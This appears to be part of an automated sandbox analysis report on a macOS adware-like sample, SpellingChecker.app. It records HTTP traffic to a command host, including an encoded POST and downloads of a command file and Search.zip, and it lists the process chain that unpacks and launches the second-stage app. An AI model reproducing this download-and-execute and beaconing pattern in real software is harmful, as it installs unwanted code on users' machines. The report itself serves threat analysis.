              Connection: keep-alive
              Accept: */*
              Accept-Language: en-us
              Content-Length: 668
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Okt 3, 2018 14:12:24.303718090 MESZ65OUTData Raw: 53 7a 6f 51 45 42 4a 46 51 31 56 43 58 6c 46 64 56 52 49 51 43 68 41 53 57 46 56 65 51 6b 6b 53 48 44 6f 51 45 42 4a 41 51 6c 39 55 52 56 4e 45 59 46 78 5a 51 30 52 2b 55 56 31 56 45 68 41 4b 45 42 49 53 48 44 6f 51 45 42 4a 52 52 68 49 51 43 68
              Data Ascii: SzoQEBJFQ1VCXlFdVRIQChASWFVeQkkSHDoQEBJAQl9URVNEYFxZQ0R+UV1VEhAKEBISHDoQEBJRRhIQChASEhw6EBASQ0VSb1lUEhAKEBISHDoQEBJGXRIQChAAHDoQEBJTWVRvX0QSEAoQABw6EBASQEYSEAoQARw6EBASU1hRXl5VXBIQChASEhw6EBASU1MSEAoQEnN4Ehw6EBASU1lUflVHEhAKEAEHHDoQEBJAQl9URVN
              Okt 3, 2018 14:12:24.336076975 MESZ66INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:24 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d ce 41 0b c2 20 18 80 e1 bf 34 21 0f 1d 3a a8 7c 86 1b 0c 9c fa 69 1d 67 4e 41 a9 4b 30 e9 d7 57 97 e8 fe bc f0 9a 3e 5a d7 d5 04 f7 f9 00 65 37 28 9b 80 fc 30 97 81 63 90 fd 1a da ed e5 25 5a df 55 84 ca a3 77 33 ac 84 2e 01 9d 11 65 b4 81 0c 49 ff 6c 4c 8e 14 74 e4 89 ba d0 8e 04 d3 c2 ff ba 8f d3 ad 6d c8 d5 c4 72 64 8c ef 26 b4 a3 0d a8 8d c8 2c 42 a3 9b ae 98 56 22 cf df 07 a8 c3 e9 0d 3e 61 e5 7d a0 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 96MA 4!:|igNAK0W>Ze7(0c%ZUw3.eIlLtmrd&,BV">a}0
              Okt 3, 2018 14:12:24.337944984 MESZ66OUTPOST /api/event/log.php HTTP/1.1
              Host: vision-set.download
              Content-Type: text/plain
              Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
              X-Sig: 3eaf976ca511e914bc519cedf60dd912
              Connection: keep-alive
              Accept: */*
              Accept-Language: en-us
              Content-Length: 136
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Okt 3, 2018 14:12:24.338150978 MESZ66OUTData Raw: 53 7a 6f 51 45 42 4a 5a 56 42 49 51 43 68 41 53 63 77 41 48 66 58 77 45 59 67 42 30 5a 32 6c 38 45 68 77 36 45 42 41 53 51 45 4a 56 56 6c 6c 49 45 68 41 4b 45 42 4a 46 51 46 52 52 52 46 56 43 41 67 49 53 48 44 6f 51 45 42 4a 64 51 31 63 53 45 41
              Data Ascii: SzoQEBJZVBIQChAScwAHfXwEYgB0Z2l8Ehw6EBASQEJVVllIEhAKEBJFQFRRRFVCAgISHDoQEBJdQ1cSEAoQEmBif3Rlc2QQf3sKEFNZVAoBBxAdEEBZVAoFEB0QQEYKARI6TQ==
              Okt 3, 2018 14:12:24.364283085 MESZ67INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:24 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140


              Session IDSource IPSource PortDestination IPDestination Port
              4192.168.0.5049239195.154.31.19780
              TimestampkBytes transferredDirectionData
              Okt 3, 2018 14:12:21.095313072 MESZ5OUTGET /files/cmdse.txt HTTP/1.1
              Host: vision-set.download
              Accept: */*
              Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Accept-Language: en-us
              Accept-Encoding: gzip, deflate
              Connection: keep-alive
              Okt 3, 2018 14:12:21.121130943 MESZ6INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:21 GMT
              Content-Type: text/plain
              Last-Modified: Tue, 25 Sep 2018 17:14:26 GMT
              Transfer-Encoding: chunked
              Connection: keep-alive
              ETag: W/"5baa6cf2-350"
              Content-Encoding: gzip
              Data Raw: 32 30 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 92 cd 8e db 30 0c 84 5f c9 2a d6 87 1c 25 9b 72 9c 20 06 44 99 94 e2 5b 63 e7 07 b0 82 2d 10 a0 36 fa f4 a5 b2 49 db 6b 6f c2 50 1c 0d 3f d1 af bb 3e 2a 35 11 97 e4 d6 76 ff bd 78 78 52 89 e0 fa 69 cc ba c8 79 73 66 9b 20 f0 e6 2c 9a b7 d6 36 b5 53 0f b8 2f 1e 6e 8b 77 96 2b 52 7c 46 6b 23 63 bb d7 4e eb ad d9 21 15 38 44 f5 e1 ab db 4e 07 76 7b 83 ab 46 f1 84 b9 18 bd bc 29 9a af ae 60 e5 ae bc 5f 52 a0 f7 fd 96 88 8e 5d 1d 16 7f 32 ad 97 ba 66 da f5 cc 25 10 4f 9c 73 69 ad 47 48 b6 47 9b 2e f1 d6 ee 61 36 03 eb 4f d8 82 69 c4 d3 f7 a1 f8 5b 9f 0f be 9a 1f 92 33 51 75 75 a3 83 e3 5e 4b 4e c9 60 51 7a b5 59 9e 35 f1 85 fc d6 53 c3 c5 47 9b ce 41 78 40 ba 01 82 a9 ab fb 72 39 99 4d ad d7 12 23 db bd 64 46 2c 0e 67 e1 33 89 3e a0 62 ef 14 57 98 52 cf d4 f5 6c cb c7 b6 e8 18 81 b5 d4 1b 2d fd 81 26 a6 f9 4b db ce 3f 06 67 da 11 66 3e 07 2e 6b e1 37 c6 66 33 ca f9 94 39 67 b6 31 d9 29 33 85 94 b6 cc bb 9a 09 ed b3 27 d9 8a 8b 43 66 fb ab 76 a3 96 79 44 c3 c1 65 16 b7 ec 69 c6 40 1d 9c 54 ce 4a 99 e9 93 a3 cc 54 63 b3 c9 3c 85 75 e6 2f 1c e7 9d 8d af 99 89 71 0a fc f1 a5 27 6e 49 ad d6 a9 d4 3c ff 15 8a f1 c5 d9 be 39 67 ae 48 c7 97 8f d4 4c 2b ff 2c 3c 21 6b 20 1e eb 10 d3 23 e7 3c 22 a0 7e 31 6c 24 5b fe eb 49 78 c1 36 e1 05 55 39 46 65 49 6a 21 f0 ca ee db 72 39 2a 46 97 ba e3 7f 71 ba 77 4c b2 2b c1 94 e8 40 e7 99 c5 63 aa df f7 64 8f ab f7 d9 d9 75 70 05 fe fc d3 fb 2f b7 c2 b0 4b e9 92 e7 79 ee 87 bc 9d f7 2e fb b1 55 43 7c ed 0d d3 ad 8f c0 75 a0 21 ef a5 ee 49 75 bf 01 55 5f 33 65 50 03 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 2060_*%r D[c-6IkoP?>*5vxxRiysf ,6S/nw+R|Fk#cN!8DNv{F)`_R]2f%OsiGHG.a6Oi[3Quu^KN`QzY5SGAx@r9M#dF,g3>bWRl-&K?gf>.k7f39g1)3'CfvyDei@TJTc<u/q'nI<9gHL+,<!k #<"~1l$[Ix6U9FeIj!r9*FqwL+@cdup/Ky.UC|u!IuU_3eP0


              Session IDSource IPSource PortDestination IPDestination Port
              5192.168.0.5049240195.154.31.19780
              TimestampkBytes transferredDirectionData
              Okt 3, 2018 14:12:21.149861097 MESZ7OUTGET /files/Search.zip HTTP/1.1
              Host: vision-set.download
              Accept: */*
              Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Accept-Language: en-us
              Accept-Encoding: gzip, deflate
              Connection: keep-alive
              Okt 3, 2018 14:12:21.175479889 MESZ8INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:21 GMT
              Content-Type: application/zip
              Content-Length: 53113
              Last-Modified: Tue, 25 Sep 2018 17:08:06 GMT
              Connection: keep-alive
              ETag: "5baa6b76-cf79"
              Accept-Ranges: bytes
              Data Raw: 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 14 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 23 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 af 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 30 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f 43 6f 64 65 52 65 73 6f 75 72 63 65 73 55 58 0c 00 8a 24 aa 5b 8a 24 aa 5b f5 01 14 00 ed 95 6d 6f da 30 10 c7 5f 97 4f 91 45 7d 01 54 c4 81 b5 1a 9b 78 10 25 45 cb 16 20 6a a8 3a 3a d6 c9 24 2e b8 38 71 e4 38 64 48 f9 f0 73 78 28 e9 44 28 68 5d 5f ed 55 4e f6 dd f9 f7 bf 3b 3b b5 e6 2f 97 48 73 c4 02 4c bd ba 5c 56 54 59 42 9e 4d 1d ec 4d ea f2 cd a0 53 aa ca cd 46 ae f6 4e eb b7 07 43 f3 4a f2 09 0e b8 64 de 5c 1a 7a 5b 92 4b 00 b4 7c 9f 20 00 b4 81 26 99 86 6e 0d 24 91 03 80 ab 9e 2c c9 53 ce fd 4f 00 44 51 a4 c0 c4 4b b1 a9 9b 38 06 c0 64 d4 47 8c 2f 0c 91 ac 24 02 14 87 3b b2 38 66 95 fd 19 8e 58 75 b0 cd 1b b9 93 da 0c 2d 1a 0f 98 a0 a0 06 12 53 ac ac 77 56 5b d7 28 a0 21 b3 51 00 2e 61 80 14 e2 33 fa 08 ba 10 7b 5d e4 85 8a 87 c7 9b 30 11 07 39 4c 8c de 9c f4 be da a1 e1 9e dd 3e 0e e9 87 f3 fe 22 ec 57 2e 54 f2 71 d1 ad 27 7e 60 ed 28 8c 3f 19 2a 7f 0f b1 8e 5b 05 4e 61 30 7d ca 99 42 3c b1 3b 63 f3 b6 1f 5d a8 b6 a6 72 a7 75 1d 79 bd 2f da 7b 43 c7 73 d2 aa de 55 fb d5 ca 9d 33 34 ce 7b 33 4e eb cb c8 0d 74 8a fa 19 3e 0b 33 4b 78 bf c5 df 72 72 16 22 b0 cb 45 29 8e d6 02 b3 44 51 9f 8b 46 42 92 d2 f5 94 6d e5 11 21 3c 99 f2 d4 3e 43 90 34 ca aa aa d6 c0 d2 4c eb d8 43 40 a8 bd 1e 1b 65 39 44 a7 99 48 2e e6 47 e3 94 0f c3 49 5a fe 52 49 b2 04 97 f7 9c 90 a5 6c 03 bf a3 bf 19 e3 99 14 cc b1 86 dd fc 69 0c 0a 47 22 96 b3 01 f3 4a 11 14 9a 23 45 b3 7e 5a 9c 32 f4 aa d5 af ec 1d 86 7c 87 41 17 45 94 cd 82 d8 9a 42 86 9c d4 82 49 c2 89 ee ad be 25 2c 8c 6f 66 db 42 6c 8e 45 b7 e2 cf 88 88 47 28 88 bb d0 ee 5b b1 81 c7 0c b2 05 c8 b7 42 4e 5d 28 54 c4 96 4f 39 49 88 62 83 4e b0 a7 73 e4 06 85 42 66 67 3d 14 70 e4 1c 3f ea d9 da 94 62 e6 2d d4 bd 07 3a fa 07 a3 5e d9 83 63 ce 26 c9 b1 6f 76 de ae c7 e8 90 49 3d 2c e7 ff d7 eb 8d 5e af ef f7 e0 c7 59 a6 a2 d7 bf 35 c8 1d 23 c7 41 8e b8 1e 8c ce 71 52 55 61
              Data Ascii: PKp9MSearch.app/UX$[y$[PKp9MSearch.app/Contents/UX$[y$[PKp9M#Search.app/Contents/_CodeSignature/UX$[y$[PKp9M0Search.app/Contents/_CodeSignature/CodeResourcesUX$[$[mo0_OE}Tx%E j::$.8q8dHsx(D(h]_UN;;/HsL\VTYBMMSFNCJd\z[K| &n$,SODQK8dG/$;8fXu-SwV[(!Q.a3{]09L>"W.Tq'~`(?*[Na0}B<;c]ruy/{CsU34{3Nt>3Kxrr"E)DQFBm!<>C4LC@e9DH.GIZRIliG"J#E~Z2|AEBI%,ofBlEG([BN](TO9IbNsBfg=p?b-:^c&ovI=,^Y5#AqRUa
              Okt 3, 2018 14:12:21.175589085 MESZ9INData Raw: 24 3f ed 4c 88 e3 e7 68 dd ae 97 ae e0 11 89 37 c6 f6 bb 4c dd c8 fd 06 50 4b 07 08 61 73 ff 21 60 02 00 00 a4 09 00 00 50 4b 03 04 0a 00 00 00 00 00 b0 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43
              Data Ascii: $?Lh7LPKas!`PKp9MSearch.app/Contents/MacOS/UX$[$[PKp9M Search.app/Contents/MacOS/SearchUX$[$[@TMDY\P\EQEeAdsKay03#KY
              Okt 3, 2018 14:12:21.175760031 MESZ10INData Raw: 8b 40 8b 83 1e d3 de 38 a5 c1 5e 13 09 14 47 fb c1 e7 db 47 34 cd e9 31 fd 98 c0 16 38 e0 1b 47 71 94 6f 3e 5f 5e 8f 0e 20 6f b0 a8 05 be a3 35 46 b5 02 f7 da be cc 56 3c e5 1f 65 a3 8f cb 44 ff dc d8 c3 1f 9a e1 21 71 21 60 05 ca 02 fe b8 f1 eb
              Data Ascii: @8^GG418Gqo>_^ o5FV<eD!q!`6^v#"kz%=%htl}i{/qJS`kODtQKwXab2CqhH/ov@ZiXe,?>|?MH4%L6MT`
              Okt 3, 2018 14:12:21.175872087 MESZ11INData Raw: aa 42 34 6a d2 9a 5d f9 a8 ce 89 dd ee d8 68 9b cc dd 51 23 35 4f 07 d1 11 85 b9 74 0c 5f 1b f1 b5 01 5f b7 e3 eb 16 44 72 55 3a 7f 3f 9a 23 bc b9 e4 11 4e 47 0c 37 8f 19 9b bf 08 c3 53 d4 bc 1f 52 ef 36 68 92 49 6b 46 07 49 4d 63 82 a4 07 46 07
              Data Ascii: B4j]hQ#5Ot__DrU:?#NG7SR6hIkFIMcFB)<)OV83JM0$+ZDR%W#aA3pMX>Fyex0%j6`)_anVa)#W"Vsxv<B`=0 4Ck`RaM*"zV
              Okt 3, 2018 14:12:21.175980091 MESZ13INData Raw: a8 1d d2 dd 83 fe 28 1b 13 58 43 e2 c6 c5 d8 0a 34 d8 e3 f9 af 9e 86 9a 41 41 eb 77 88 d4 84 c5 48 aa 07 13 ea 84 ad c5 f3 19 44 57 9b 03 92 78 48 4d f1 30 9a 31 fe 84 4f 1a b4 bd 03 1d 3f 92 4d 94 39 6d 00 37 72 23 4c b8 85 41 72 a4 b2 06 1c 87
              Data Ascii: (XC4AAwHDWxHM01O?M9m7r#LArD`b,VK0,r9`nD&ti$m8;Q@iAHMhq\*w5q/>mvL9?\0Yb"JHh8&Cvn
              Okt 3, 2018 14:12:21.176088095 MESZ14INData Raw: 16 09 88 ab e0 a6 99 6b 9b 5c db a0 df 8f 6f 6c c7 7a d9 51 91 8d bd 65 f7 e2 4c 29 da 02 8b ed c5 ad 38 c7 00 de de 02 0f c2 b4 9f 5b ed b0 73 2f ce 30 a3 09 c0 0d d7 4c 6a a4 d5 00 f2 87 18 eb 70 37 ba 93 8a 76 fb 77 c5 d8 32 fd f0 b8 5e 13 73
              Data Ascii: k\olzQeL)8[s/0Ljp7vw2^s#}VYQi?sv>QLLLP_bb8Tss-VNv^F9hX0;9Cw1o>zO??4MON{_I'gr 8-m,kw&
              Okt 3, 2018 14:12:21.176201105 MESZ15INData Raw: d3 2a c1 07 2e e3 fc 0a bd 43 5c 99 71 0c 63 8c 9b 35 0a f2 9e 7f 8d 85 7c e4 ac c1 b0 4f f0 9f 08 f0 6b 89 e8 5e 15 2c 1a 85 de fd 93 8e a1 4b 03 2a dd f6 9e e4 ba 03 48 bd 27 7c 7b db 7b f2 99 6b 3d 44 68 1d f6 f1 ed 3f 0e 51 87 b8 ee 42 6c 3a
              Data Ascii: *.C\qc5|Ok^,K*H'|{{k=Dh?QBl:X":,wsm@|(]s!Q.gy!J1(8-*p*o;1uHQd(t"QQD(@Dq<#XZ\+<`A#pe?
              Okt 3, 2018 14:12:21.176309109 MESZ16INData Raw: 4a 38 8a 8c e5 32 51 5c 38 99 95 68 1b 4e de 17 84 93 be 3e cd 8f 6e 26 e2 28 71 52 22 f5 71 31 17 b4 78 a4 cc 6a 7c 56 1c 96 68 b9 1f d9 d7 07 23 bc b5 d8 63 34 e0 7b 15 53 8f 91 a7 be 10 de 8d e0 ef 69 c8 71 0d 1e 11 8c f8 c5 1b cf a7 d4 85 97
              Data Ascii: J82Q\8hN>n&(qR"q1xj|Vh#c4{SiqD: Y$n[(v;drsAX14d`7VMcTI(X7@QjK"' PLWR}1TO(o@\=7>%J4M
              Okt 3, 2018 14:12:21.176417112 MESZ17INData Raw: 20 56 db 37 b5 52 05 a8 27 37 c9 6a b0 a8 12 7a 7e 8d 56 ba de 8a 67 48 a0 a2 4b c3 d1 e0 fd 8d 54 02 2a 3a 35 dc aa 22 50 0e 1d 78 e8 74 cc 27 85 7c 73 dc d0 ca da b9 9a c8 f7 8a a8 42 4e f1 0c d1 42 5b d1 4a 38 1b b1 1e 6e ce eb 47 68 6b 4a c9
              Data Ascii: V7R'7jz~VgHKT*:5"Pxt'|sBNB[J8nGhkJDNDONOX|NHBwmB`5D[-JW1\@x~Z7N(ta5gR2J7228b>GIo{On2T(F[v{>
              Okt 3, 2018 14:12:21.176531076 MESZ19INData Raw: e4 e4 28 77 03 e5 d0 0b 35 ae fd 88 72 11 28 77 06 e5 c6 a3 dc 11 4c 87 72 fb 51 6e 1e ca ed 44 b9 17 50 6e 0b ca 7d 84 72 6f a0 dc 19 94 7b 19 e5 d0 f9 cf b5 e7 51 ae 2d 92 7e 31 ca f5 41 b9 79 28 17 83 72 06 94 cb 41 b9 e9 28 37 17 e5 f2 51 ee
              Data Ascii: (w5r(wLrQnDPn}ro{Q-~1Ay(rA(7QUS&ZjKUdb'YD^?B58LZi`!EfT3dhTKYAKYZ!)`J4hF33eJCT%[+U=2QXut29j[4
              Okt 3, 2018 14:12:21.201268911 MESZ20INData Raw: 45 ea 25 39 24 d8 9c 4a 95 a1 d1 2b f1 42 59 cc b2 86 68 23 5a dd 32 79 c2 45 eb 31 ef 0c 8d 36 47 9b a8 91 e3 b5 19 4d 89 54 98 40 02 9a 44 9d ac 88 23 c1 3a 2a 43 3e ba 50 07 52 21 e3 b6 4e 7d 9b f6 a1 83 a3 8d 2a 15 f1 25 d4 1d f0 95 d0 9c 28
              Data Ascii: E%9$J+BYh#Z2yE16GMT@D#:*C>PR!N}*%(L}YYQokOBZF"d:CVbfHfR1ZT5m.D"6lx>jHJgZ3[|6DlodI*T(Q4kK3+h'Q(@d$k2;


              System Behavior

              Analysis Process: xpcproxy PID: 710 Parent PID: 1

              General

              Start time:14:12:18
              Start date:03/10/2018
              Path:/usr/libexec/xpcproxy
              File size:43488 bytes
              MD5 hash:d1bb9a4899f0af921e8188218b20d744

              Chronological Activities

              Analysis Process: SpellingChecker PID: 710 Parent PID: 1

              General

              Start time:14:12:18
              Start date:03/10/2018
              Path:/Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker
              File size:154224 bytes
              MD5 hash:0194c31984d1501bf9835c0d4d48cbbf

              Chronological Activities

              Analysis Process: sh PID: 711 Parent PID: 710

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: sh PID: 712 Parent PID: 711

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: ioreg PID: 712 Parent PID: 711

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/usr/sbin/ioreg
              File size:45040 bytes
              MD5 hash:c728ee7d6c0e4941de5ab855a856f473

              Chronological Activities

              Analysis Process: sh PID: 713 Parent PID: 711

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: grep PID: 713 Parent PID: 711

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/usr/bin/grep
              File size:33936 bytes
              MD5 hash:2b3efb273296881708ea2914c612e0eb

              Chronological Activities

              Analysis Process: sh PID: 714 Parent PID: 711

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: wc PID: 714 Parent PID: 711

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/usr/bin/wc
              File size:23072 bytes
              MD5 hash:b89949ce6a1929257e5c0c157027cbfe

              Chronological Activities

              Analysis Process: xattr PID: 715 Parent PID: 710

              General

              Start time:14:12:20
              Start date:03/10/2018
              Path:/usr/bin/xattr
              File size:925 bytes
              MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

              Chronological Activities

              Analysis Process: Python PID: 715 Parent PID: 710

              General

              Start time:14:12:20
              Start date:03/10/2018
              Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
              File size:51744 bytes
              MD5 hash:ba780ab677147d9db60c564ef3f51dd0

              Chronological Activities

              Analysis Process: xattr PID: 716 Parent PID: 710

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/usr/bin/xattr
              File size:925 bytes
              MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

              Chronological Activities

              Analysis Process: Python PID: 716 Parent PID: 710

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
              File size:51744 bytes
              MD5 hash:ba780ab677147d9db60c564ef3f51dd0

              Chronological Activities

              Analysis Process: sh PID: 717 Parent PID: 710

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: sh PID: 718 Parent PID: 717

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: unzip PID: 718 Parent PID: 717

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/usr/bin/unzip
              File size:186048 bytes
              MD5 hash:f598378ec162f3480d71dc44cc07243c

              Chronological Activities

              Analysis Process: xattr PID: 719 Parent PID: 710

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/usr/bin/xattr
              File size:925 bytes
              MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

              Chronological Activities

              Analysis Process: Python PID: 719 Parent PID: 710

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
              File size:51744 bytes
              MD5 hash:ba780ab677147d9db60c564ef3f51dd0

              Chronological Activities

              Analysis Process: xattr PID: 720 Parent PID: 710

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/usr/bin/xattr
              File size:925 bytes
              MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

              Chronological Activities

              Analysis Process: Python PID: 720 Parent PID: 710

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
              File size:51744 bytes
              MD5 hash:ba780ab677147d9db60c564ef3f51dd0

              Chronological Activities

              Analysis Process: open PID: 721 Parent PID: 710

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/usr/bin/open
              File size:105952 bytes
              MD5 hash:40ed6d8f35c9f20484b97582d296398f

              Chronological Activities

              Analysis Process: xpcproxy PID: 722 Parent PID: 1

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/usr/libexec/xpcproxy
              File size:43488 bytes
              MD5 hash:d1bb9a4899f0af921e8188218b20d744

              Chronological Activities

              Analysis Process: Search PID: 722 Parent PID: 1

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/private/tmp/Search.app/Contents/MacOS/Search
              File size:70384 bytes
              MD5 hash:964bacf4c598811008b7b6379945eb8a

              Chronological Activities

              Analysis Process: sh PID: 723 Parent PID: 722

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: sh PID: 724 Parent PID: 723

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: sh PID: 724 Parent PID: 723

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: sh PID: 725 Parent PID: 724

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              Chronological Activities

              Analysis Process: defaults PID: 725 Parent PID: 724

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/usr/bin/defaults
              File size:39472 bytes
              MD5 hash:831678c94c2d9c647bf3d283b1861bda

              Chronological Activities